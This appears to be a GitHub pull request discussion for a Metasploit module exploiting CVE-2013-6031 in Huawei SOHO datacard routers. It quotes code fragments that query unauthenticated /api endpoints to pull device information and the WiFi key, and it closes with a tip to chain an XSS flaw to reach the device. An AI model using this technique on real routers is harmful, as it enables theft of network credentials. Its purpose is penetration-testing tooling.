Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Huawei SOHO router information disclosure, cve-2013-6031 #3019

Merged
merged 1 commit into from

7 participants

Tom James Josh wvu-r7 Juan Vazquez HD Moore Tod Beardsley jvennix-r7
Tom James

Add VU#341526 (CVE-2013-6031): Huawei Datacard Information Disclosure vulnerability.

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((25 lines not shown))
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ # [ 'OSVDB', '6031' ],
+ # [ 'BID', '6031' ],
+ # [ 'URL', 'http://seclists.org/bugtraq/2013/Nov/6031' ],
+ ],
+ 'DisclosureDate' => "Nov 11 2013" ))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin']),
+ OptBool.new('GAP', [false, 'Attempt admin password reset using wifi password.', false]),
+ ], self.class)

where are these options used?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
@@ -0,0 +1,506 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, CSRF Information Disclosure Vulnerability",

Is this a CSRF exploit?

Tom James
aczire added a note
Tom James
aczire added a note
Juan Vazquez Collaborator

As @aczire I dont think this module is exploiting CSRF, since it's interacting with the server directly, without any user/browser interaction. So I would ask to delete the CSRF from the title here. (Even when probably the app could be vulnerable to CSRF, this module isn't abusing it).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Josh
Collaborator

@aczire can you add a description to your pull request, it's very unlikely to get merged w/o one. Also, you can get some hints for writing a good description form CONTRIBUTING.md

wvu-r7
Collaborator

@aczire: Please complete review.

Tom James

@kernelsmith Does that mean I need to rewrite the description? Added description pull request anyway. @jvennix-r7 option to set Password bruteforce has removed from the module. @wvu-r7 Please let me know if anything else needs to be done.

Juan Vazquez
Collaborator

Module ins't msftidy compliant, should be fixed msftidy compliant before we can't go ahead. thanks!

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((39 lines not shown))
+ #Gather basic router information
+ get_router_info
+ print_status("")
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ }, 25)
Juan Vazquez Collaborator

Please allow send_request_raw to sue use its default timeout unless there is a good reason to modify it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Juan Vazquez
Collaborator

Please report interesting information to the database, see Msf::Auxiliary::Report

Tod Beardsley todb-r7 added the module label
Tom James aczire changed the title from Huawei SOHO router information disclosure and csrf, cve-2013-6031 to Huawei SOHO router information disclosure, cve-2013-6031
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((2 lines not shown))
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
Juan Vazquez Collaborator

Metasploit modules support CWE as references. So it's better to add a reference than write it in the description.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
@@ -0,0 +1,522 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
Juan Vazquez Collaborator

Huawei Datacard Information Disclosure Vulnerability

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((11 lines not shown))
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
+ SOHO routers. The module will gather information by accessing the /api pages where
+ authentication is not required, allowing configuration changes
+ as well as information disclosure including any stored SMS.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
Juan Vazquez Collaborator

No spaces around [at]: tomsmaily[at]aczire.com

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((16 lines not shown))
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
+ SOHO routers. The module will gather information by accessing the /api pages where
+ authentication is not required, allowing configuration changes
+ as well as information disclosure including any stored SMS.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ [ 'URL', 'http://www.kb.cert.org/vuls/id/341526' ],
Juan Vazquez Collaborator

['US-CERT-VU', '341526']

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((23 lines not shown))
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ [ 'URL', 'http://www.kb.cert.org/vuls/id/341526' ],
+ [ 'URL', 'http://www.huaweidevice.co.in/Support/Downloads/' ],
+ ],
+ 'DisclosureDate' => "Nov 11 2013" ))
+
+ register_options(
+ [
+ Opt::RHOST("mobilewifi.home")
Juan Vazquez Collaborator

Is it hardcoded name for the device or something like that?

Tom James
aczire added a note

yup, router's internal DNS resolver resolves this to local router ip.

wvu-r7 Collaborator
wvu-r7 added a note

Cute. Kinda like routerlogin.net.

Tom James
aczire added a note

yup, the Huawei way!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((48 lines not shown))
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ })
+
+ #check whether we got any response from server and proceed.
+ if not res
Juan Vazquez Collaborator

unless res

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((54 lines not shown))
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ })
+
+ #check whether we got any response from server and proceed.
+ if not res
+ print_error("Failed to get any response from server!!!")
+ return
+ end
+
+ #Is it a HTTP OK
+ if (!(res.code == 200))
Juan Vazquez Collaborator

unless res.code == 200

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((40 lines not shown))
+
+ end
+
+def run
+
+ #Gather basic router information
+ get_router_info
+ print_status("")
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
Juan Vazquez Collaborator

I've the feeling it should be a method too.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((156 lines not shown))
+ rescue::Exception => e
+ print_status("Ooooops: #{e.class} #{e}")
+
+ #end run
+ end
+
+def get_router_info
+
+ print_status("Attempting to connect to #{rhost} to gather basic device information...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/device/information',
+ })
+
+ #check whether we got any response from server and proceed.
Juan Vazquez Collaborator

You make the same checks for every response -> res, code, Server header. Worths to refactor to not having the code copied on several places.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((181 lines not shown))
+ print_error("Did not get HTTP 200, URL was not found. Exiting!")
+ return
+ end
+
+ #Check to verify server reported is a Huawei router
+ if (res.headers['Server'].match(/IPWEBS\/1.4.0/i))
+ print_status("Server is a Huawei router! Grabbing info\n")
+ else
+ print_error("Target doesn't seem to be a Huawei router. Exiting!")
+ return
+ end
+
+ print_status("---===[ Basic Information ]===---")
+
+ # Grabbing the DeviceName
+ if res.body.match(/<DeviceName>(.*)<\/DeviceName>/i)
Juan Vazquez Collaborator

All the module keeps repeating the same code again and again. I think worths to reafctor. You can use a dictionary of Regexs and loop on every entry to find the information on the responses. Also worths to use a method to find the information, so you don't need it to repeat the code again and again.

You can use constants to store the dictionary of regexs, since I guess it's going to be static information.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Tod Beardsley todb-r7 added the feature label
HD Moore
Owner

Given how long this has been in the queue and how much work needs to be done, we should consider closing this for now and revisiting it in the future once the module has been cleaned up.

HD Moore
Owner

Assigning to @jvazquez-r7 since the previous feedback was all his. I can take it otherwise.

Tod Beardsley
Owner

So, this has Unstable written all over it. Juan made a lot of suggestions, the contributor never responded, we don't appear to have the gear to test.

@jvazquez-r7 will implemented his suggestions and unless @aczire (or anyone else!) shows up to test the changes, it'll get shuttled up to Unstable until someone cares to test.

Juan Vazquez jvazquez-r7 referenced this pull request from a commit in jvazquez-r7/metasploit-framework
Juan Vazquez jvazquez-r7 Rebase #3019 f83b87f
Juan Vazquez jvazquez-r7 referenced this pull request in aczire/metasploit-framework
Merged

Clean Huawei SOHO router information disclosure #1

Juan Vazquez
Collaborator

Hello @aczire , aczire#1 rebases (updates) your branch and cleans up your module. There a lot of commits, only the last ones are modifications to your code.

Please feel free to review the changes and ask if you have any doubts or you would like to discuss any point. Once ready, land in your repository and this pull request will be automatically updated. Please test the modules with changes, because I just fixed code, I hadn't a device for testing. So maybe I've wasted something, please check/test carefully

Then we'll need network captures and screenshots showing the module with changes working. And it will be ready to go! Network captures / screenshots can be sent to msfdev[at]metasploit.com

Thank you!

Tom James

@todb-r7 @jvazquez-r7 apologies for the delay. You know, personal things and work takes the most priority. Well, thanks alot for showing interest in this module. Will do the testing and report back shortly.

Tom James aczire Merge pull request #1 from jvazquez-r7/rebase_3019
Clean Huawei SOHO router information disclosure
6ec3e65
Juan Vazquez
Collaborator

@aczire thanks for landing aczire#1 , please remember to send traffic capture and screenshot of module working to msfdev[at]metasploit.com for validation and it will be ready to go! :) Thanks!

Tom James

@jvazquez-r7 Just sent a mail to msfdev with the screenshots and packet capture. Could you please take a loook at it and let me know if anything amiss?? Thanks...

Juan Vazquez
Collaborator

Thanks @aczire , got the email. I'll review materials along the day and will update it if something is missing, will land otherwise :)

Juan Vazquez jvazquez-r7 merged commit 6ec3e65 into from
Juan Vazquez jvazquez-r7 referenced this pull request from a commit
Juan Vazquez jvazquez-r7 Land #3019, @aczire's module for Huawei info disclosure
* Module for CVE-2013-6031
b4419af
Juan Vazquez
Collaborator

Data looks good, landed, thanks @aczire !

Tom James

Nice to see the module landed. Thanks alot @jvazquez-r7 for making this happen.

For any one looking out to use the module, leverage the XSS vulnerability (CVE-2014-2968) in the SMS interface to get this module running against the datacard.
It seems other related datacards from Huawei are also vulnerable.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Jan 24, 2015
  1. Tom James

    Merge pull request #1 from jvazquez-r7/rebase_3019

    aczire authored
    Clean Huawei SOHO router information disclosure
This page is out of date. Refresh to see the latest.
Showing with 0 additions and 0 deletions.
Something went wrong with that request. Please try again.